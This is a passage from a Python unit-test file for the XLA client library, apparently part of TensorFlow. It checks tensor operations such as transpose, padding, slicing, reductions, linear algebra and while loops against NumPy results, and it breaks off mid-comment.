self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
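    # Each padding spec is (edge_padding_low, edge_padding_high, interior_padding),
    # mirroring the PaddingConfig fields used in the next test.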
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().ExecuteWithPythonValues()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
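    # l is lower-triangular with a positive diagonal, so the Cholesky factor of
    # np.dot(l, l.T) is l itself.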
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(c.Constant(a_vals), c.Constant(b_vals), left_side=False,
lower=True, transpose_a=True)
self._ExecuteAndCompareClose(c, expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
], dtype=np.float32), rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
c.Gather(c.Constant(a), c.Constant(indices), dnums, slice_sizes=[1, 1])
g = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddS32Computation(self):
"""Computation (s32, s32) -> s32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayS32(0)),
c.ParameterFromNumpy(NumpyArrayS32(0)))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
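# Illustrative note (not part of the original test file): the ReduceWindow cases
# above can be checked by hand. With window_dimensions=(2, 1) over the 2x3 input,
# VALID padding only places the window where it fully fits, summing each column
# once: [[1+4, 2+5, 3+6]] == [[5., 7., 9.]]. SAME padding zero-pads so the output
# keeps the input shape, and the extra row of windows covers only the second input
# row, giving [[5., 7., 9.], [4., 5., 6.]]. A window stride of 2 along dimension 1
# (the "general strides" case) keeps every other column of the VALID result,
# giving [[5., 9.]].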
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
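# Illustrative note (not part of the original test file): the While loops above
# start from 1.0 and double on every iteration while the "< 10" condition holds,
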